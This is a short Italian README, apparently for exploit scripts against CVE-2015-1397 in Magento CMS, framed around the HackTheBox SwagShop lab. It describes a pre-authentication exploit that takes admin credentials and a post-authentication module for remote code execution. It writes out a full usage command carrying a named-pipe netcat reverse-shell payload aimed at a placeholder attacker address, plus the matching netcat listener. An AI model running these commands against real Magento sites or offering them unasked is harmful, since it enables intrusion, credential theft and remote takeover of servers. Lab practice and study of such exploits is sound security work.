
Script di exploit per CVE-2015-1397 in Magento CMS, inclusi un exploit pre-autenticazione per ottenere credenziali admin e un modulo RCE post-autenticazione per l'esecuzione di reverse shell.
Vulnerabilità come vista in HackTheBox - SwagShop
Ottieni le credenziali di amministratore per il pannello di controllo di Magento CMS
Con le credenziali ottenute da exploit.py aggiunte a post_auth.py esegui:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
Ascoltatore:
nc -lvnp 4444